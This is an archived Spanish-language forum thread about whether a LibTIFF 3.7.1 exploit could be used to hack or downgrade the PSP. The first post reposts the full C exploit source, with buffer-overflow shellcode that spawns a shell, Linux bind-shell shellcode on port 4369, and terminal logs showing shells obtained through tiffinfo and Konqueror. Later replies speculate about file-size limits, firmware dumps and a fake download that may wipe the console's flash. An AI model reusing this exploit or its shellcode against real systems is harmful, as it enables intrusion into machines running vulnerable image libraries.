nuevo TIF XPLOIT???

Archivado
1, 2
POS COMO LO LEEIS ...cita de maxconsole:

Hello all,
I have been browing exploit website and wow , a new libtiff exploit today
Quote:
/*
LibTIFF exploit
Tested on LibTIFF 3.7.1
Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat

Blog: http://gruba.blogspot.com

In other versions and/or Linux distributions you might need to
adjust some offsets.

gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit
cc libtiff_exploit.c -o libtiff_exploit
gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff
Using RET: 0xbfffffb4
TIFFReadDirectory:
Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.
evil.tiff:
Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1); tag trimmed.
evil.tiff:
Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
sh-3.00$

gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit
/usr/kde/3.3/bin/konqueror evil.tiff
Linux Enabled
Using RET: 0xbfffffb1
konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider
TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.
: Warning, incorrect count for field "PhotometricInterpretation" (150341633, expecting 1);
tag
trimmed.
: Warning, incorrect count for field "BitsPerSample" (257, expecting 1); tag trimmed.
sh-3.00$ exit
exit

Heheh it also works like a remote exploit i would leave that work (easy work) for the
"interested" people.

*/

#include
#include
#include
#include
#include
#include
#include

#define OFFSET 0x3F /* return address offset */
#define SHELL_OFFSET 0x0102 /* shellcode address offset */
#define DISPLAY "DISPLAY=:0.0" /* no comments ... */
#define HOMEDIR "HOME=/tmp/"

int
main(int argc, char **argv, char **env)
{
/* Linux shellcode that binds a shell on port 4369 */
char linux_bind[] = "\x31\xc0\x50\x40\x50\x40\x50\xb0\x66\x31"
"\xdb\x43\x89\xe1\xcd\x80\x99\x52\x52\x52"
"\xba\x02\x01\x11\x11\xfe\xce\x52\x89\xe2"
"\x31\xc9\xb1\x10\x51\x52\x50\x89\xc2\x89"
"\xe1\xb0\x66\xb3\x02\x89\xe1\xcd\x80\xb0"
"\x66\xb3\x04\x53\x52\x89\xe1\xcd\x80\x31"
"\xc0\x50\x50\x52\x89\xe1\xb0\x66\xb3\x05"
"\xcd\x80\x89\xc3\x31\xc9\xb1\x03\xb0\x3f"
"\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f"
"\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51"
"\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* (?) lies lies lies lies!*/
#ifdef FREEBSD
printf("FreeBSD Enabled\n");
char shellcode[]=
"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\ x3b\x50\xcd"
"\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\ x68\x23";

#else
printf("Linux Enabled\n");
char shellcode[] =
"\xeb\x20\x5e\x89\x76\x08\x31\xc0\x89\x46\x0c"
"\x88\x46\x07\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
"\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\xb0\x01\xcd"
"\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\x23";

#endif

if(argc < 3)
{
fprintf(stderr, "Error, arguments are like these\n"
"%s \n", argv[0]);
return -1;
}

char *envp[] = {HOMEDIR, DISPLAY, shellcode, NULL};

/* argv[1] -> executable file that is linked with vuln tiff library */
long ret = 0xc0000000 - sizeof(void *) - strlen(argv[1]) - strlen(shellcode) - 0x02;

int fd = open(argv[2], O_RDWR);
if(fd == -1)
{
perror("open()");
return -1;
}

if(lseek(fd, OFFSET, SEEK_SET) == -1)
{
perror("lseek()");
close(fd);
return -1;
}

if(write(fd, (void *) &ret, sizeof(long)) < sizeof(long))
{
perror("write()");
close(fd);
return -1;
}

close(fd);

fprintf(stdout, "Using RET: 0x%.8x\n", (unsigned int) ret);

if(execle(argv[1], "tiff", argv[2], NULL, envp) == -1)
{
perror("execve()");
return -1;
}

return 0;
}

Maybe the psp is not affected but the psp vshell still use libtiff so it might be open to new exploit


POS ESO: yo no me quiero sobreexicitar..pero si esto funciona... [jaja] [jaja]
pero igual es el mismo exploit..quien sabe
Pero seguro que esa es la libreria que usa la psp?. SI es asi puede ser la ostia.
eso lleva una semana por lo menos en maxconsole
si es verdad
pero lo han vuelto a retomar el hilo
y si os fijais en pspupdates tambien estan hablando sobre ello

igual sale algo [fumando] [fumando]
este nuevo esploit es para 2.xx¿? espero k sea cieto esto seria bombazo [jaja]
grial12zgz escribió:si es verdad
pero lo han vuelto a retomar el hilo
y si os fijais en pspupdates tambien estan hablando sobre ello

igual sale algo [fumando] [fumando]


Puedes poner el link de PSPUpdates??
si , con mucho gusto...jaja

link pspupdates: http://forums.qj.net/showthread.php?t=42378

y otro que acaban de abrir:
http://forums.qj.net/showthread.php?t=42437 (menos importante)
mi ingles es muy limitado alguien podria explicarlo brevemente please ¿? [triston]
creo k esto ya se hablo, la psp tiene otro tipo de librerias con el bug arreglado.
creo k esto ya se hablo, la psp tiene otro tipo de librerias con el bug arreglado.


Este xploit es OTRO nuevo, pero parece ser que tampoco afecta a la última versión...y aunque lo hiciese, parece no ser un buffer overflow, que es lo que se necesita para la PSP...


De todas formas, la libTIFF parece cargada de errores...tal vez deberían de atacar por ahí, ya que creo que es una librería open source, lo que significa que hay cierta facilidad para buscar fallos... [poraki]


Al final Sony quitará el soporte para TIFF, ya lo veréis [carcajad]
dos preguntitas rapidas:

¿este exploit afecta a las 2.00+?

y para los que no sabemos nada de como aprovechar un exploit: ¿que pueden lograr a partir de éste? Es decir, lo jugoso, si lo podrian aprovechar para hacer un downgrade, cargar isos o hacer otro cargador de homebrew, mejorar la compatibilidad para el homebrew, yoquese, es que no tengo ni zorra de exploits.

thanks y saludos a todos!! [fumando]
segun e leido en pspupdates, se necessita una imagen de 4GB?!?!? o mas para que el xploit funcione? si es asi, tiene utilidad nula
Si se necesitan 4 gb los de sony se hacen ricos con las tarjetas de 8...

El codigo para logico, otra cosa es lo que ara...
se decia que alomejor esta libreria tendria multiples vulnerabilidades.

el caso es que si tu en tu ordenador le metes una foto de 4 gb va a echar chispas.

Se va a tirar 1/2 hora pa leerlo

Haber si se puede sacar algo de provecho como por ejemplo un modo kernel comleto o algo asi

Ahora es cuando hay que rezar
umm.. esto.... 4 GB?? Oooh
si un dia se te jode la lente de la psp por utilizar los UMD comprate otra lente, o comprate otra psp.... total, te sale mas barato...
por lo que se vé, puede que las 2.60 no son "xploitables" xq lleva la libreria ultima, y a parte, esto no hace un buffer-overflow, hace un Denial Of Service, un DoS y esto no interesa en la psp...

saludos
un tiffxploit de 4 GB jajaja vaya mie**a no t extrañe k sony este detras d este tiffxploit para vendernos MS d 8 gb komo pongas eso en la psp la negrita aria bumm seguro k es d sony xke dijo k los videos en UMD tubieron poko exito y k se centarria crear memory sticks d mayo capacidad y komo sabe k nadie se gastaria 200 € pos no sacan esto en fin es mi opinion k nadie s m tire al cuello eh :-)

SALU2
ya tienen en vendes ms para el verano , jeje
ahora cogen en el verano y sale un megaxploid que carga de todo en la 3.0 y ale a vender millones de ms de 4 - 8 gigas y ellos tan contentos ,
salu2
bueno y otro problema.... no se decia por aqui que aunque metieras una memoria de 100GB (ejemplo) solo reconoceria 4 la psp? Si se necessitan mas de 4GB y en el mejor de los casos solo reconoce 4... tampoco hay fallo no?
darix2006 escribió:bueno y otro problema.... no se decia por aqui que aunque metieras una memoria de 100GB (ejemplo) solo reconoceria 4 la psp? Si se necessitan mas de 4GB y en el mejor de los casos solo reconoce 4... tampoco hay fallo no?



Y digo yoo, pa que entonces esta Sony fabricando memory stick de 8 gigas para venderlas dentro de poco para la psp?, no se si la limitacion de los 4 gigas es de software o de hardware, pero si es de software es muy probable que lo solucionen en la 3.0, obligando a actualiza a aquellos que quieran usar memorys de 8 gigas.
La psp no lee actualmente mas de 4gb pq su firmware trabaja con el sistema de archivos fat. Esto se puede subsanar facilmente si sony implementa otro tipo de archivos en su proximo firmware.
Seguro k necesita 4 gb?
xke tiene k ser 4 gb no lo entiendo alguien podria explikarm xke ¿? [tomaaa]
es lo que entendi que decian en pspupdates... osea que tampoco es nada "oficial"
No creo que les sea tan dificil migrar el sistema de archivos a fat32.
well there IS one for all versions of LibTIFF... but it requires the handling of an image over 4Gb in size... which is currently impossible on the PSP.


extraido de pspupdates

y si seguimos...

Agustin has shared a new LibTIFF v3.7.1 Exploit For PSP today. Although the PSP (FW2.6+) is not directly affected, the VSHELL still uses LibTIFF so only time will tell what new doors may be opened. At the very least, it could allow dev'ers to dump the v2.60 Firmware to examine the new formatting for future developments.

con esto yo entiendo que podria servir para dumpear el firmware 2.6 y examinarlo no?¿
Y utilizar la imagen de 4Gb a traves de pc? seria desarrollar un homebrew capaz de abrir archivos ubicados en el disco duro de un pc, y asi usarlo? tal vez este diciendo una gilipollez, pero quien sabe?
darix2006 escribió:con esto yo entiendo que podria servir para dumpear el firmware 2.6 y examinarlo no?¿


solo se podia trastear con el pero a la minima k tocas un firmwae d la psp aunke solo sea un bit la psp lo reconoceria komo un archivo corrupto anke podria ser util para cear un FW desde 0
HaRdCoRe!! escribió:

solo se podia trastear con el pero a la minima k tocas un firmwae d la psp aunke solo sea un bit la psp lo reconoceria komo un archivo corrupto anke podria ser util para cear un FW desde 0


si, eso lo se, pero tenia entendido que el 2.6 no habia sido possible dumpearlo no?
nose, quiza me estoy haciendo un lio pero tenia entendido que no era possible, solo hasta la 2.5 (que es la que se usa ahora en algunos juegos con el mph y tal)

saludos
mmm la kuestion es . tndria aceso al kernel¿?
Yo creo ke si el tiff xploit este es similar al de 2.00, se tendria kernel mode igual ke en otro no? Y si es asi, sony se lo a montado de puta madre para aora vender M$ de 4 u 8 GB´s por un tubo. De todas formas la idea de HaN_Fl0W no esta mal, aunke creo recordar ke intentaron algo parecido y dijeron ke no se podia acceder al pc desd la psp, me refiero a archivos dentro de el.
Es igual, sólo es necesario utilizar el xploit una vez para hacer el downgrader...

Y además, no tiene sentido lo de meter un archivo de 4gb...será para "petar" la librería, pero vamos, eso se podría conseguir "falseando" el tamaño del archivo .Ya sabéis, las mini-imágenes de los juegos lo hacen, hacen creer al windows que el tamaño del archivo es de 4gb, cuando en realidad ocupan poco más de 100ks...

Cómo? Supongo que toqueteando en modo hexadeciamal o algo...porque cuando creamos un archivo, en el propio archivo se incluye el tamaño de dicho archivo. Está claro que el windows no se pone a "medir" cada bit de un archivo para saber su tamaño, sino sería de locos. Al igual que tampoco lo hace con el espacio libre del disco duro, sino tardaría montón...todo está ya precalculado.

Lo que no sé es si el problema está en el tamaño virtual del archivo (es decir, hacer creer que pesa 4gb...) o en que realmente se necesitan 4gb de dummies para poder usar el xploit...

Bueno, sea lo que sea, deseamos suerte a esta gente para que consigan un downgrader, al menos para mi psp 2.50 :P
Sí tío, como agua de mayo, a ver si hay suerte con este proyecto... que es de lo único serio que se ha visto desde hace tiempo (en cuanto a downgrade refiere)
.
Gracias por la explicacion [oki]
Bueno y nada nuevo sobre este tema?
vamos q no se va a poder acer na no??
Sólo se me ocurre una manera de intentar cargar una imagen tan grande sin tener que guardarla en la MS, y es a través del navegador, por wifi, se sabe si funcionaría este exploit cargando así la imagen?
yo que no le veo mucho futuro a esto.... no me acaba de convencer [mamaaaaa]
De todas formas sería imposible teniendo en cuenta de que las Memory Stick utilizan FAT32 (Creo, porque ahora que acabo de ver pone FAT (FAT16?)), con lo cual es imposible meter archivos superiores a 4gb :S
Damizean escribió:De todas formas sería imposible teniendo en cuenta de que las Memory Stick utilizan FAT32 (Creo, porque ahora que acabo de ver pone FAT (FAT16?)), con lo cual es imposible meter archivos superiores a 4gb :S


ombre con FAT32 se pueden asta particiones de 2 terabytes no?
no es lo mismo que te permita tener una particion a que te permita tener un archibo, si no recuerdo mal en el fat 32 solo puedes mover mas de 4 gigas en un archivo...lo digo porke lo sufri con la ps2 y me pase a ntfs

PD: Que no esoty seguro que esto no se me da mi¡uy bien...

PD: Hostias!!!! quiero en downgrader ya!!!! a porcierto no se podria sacar un bug desde el navegador??? me acuerdo que en el windows si abrias una imagen desde el navegador petaba...pues en el navegador de la psp se descarga la imagen y listo no??? no puede que pete??
Pero la psp usa FAT, no FAT32 no??
Es que en caso de que la PSP use FAT16 solo podría llegar hasta los 2 gigas :S

http://en.wikipedia.org/wiki/File_Allocation_Table
Damizean escribió:Es que en caso de que la PSP use FAT16 solo podría llegar hasta los 2 gigas :S

http://en.wikipedia.org/wiki/File_Allocation_Table



Y no hay alguna manera de que la psp reconociera una MS en formato FAT32?
masual escribió:Pero la psp usa FAT, no FAT32 no??


si, a eso me refiero, que con un fat 32 solo se pueden mover archivos de 4 gigas(si no recuerdo mal) con fat16(creoke es la psp) como mucho podra mover la mitad del fat 32
Buenas, e estado mirando por ai y e encontrado esto en pspupdates. Alguien habia visto esto ya? Significa ke ya funciona este tiff overflow? La verdad es ke me e kedao perplejo al verlo. A ver si alguien contesta. Saludos
esti es un puto fake ya lo habia provado yo y no rula ni pa tras
joder no tngo ni idea m lo estoi bajando aver si rula d momento el archivo comprimido son 13 mb :S
si es el FAKE que recuerdo pueden ser 2 cosas:

El update de 1.50 modificado (pierde firma y no va)

El Format A (virus que borra algunos archovos de la flash0 y deja la psp como un pisapapeles)

Este ultimo no creo.
84 respuestas
Archivado
1, 2
Volver a Scene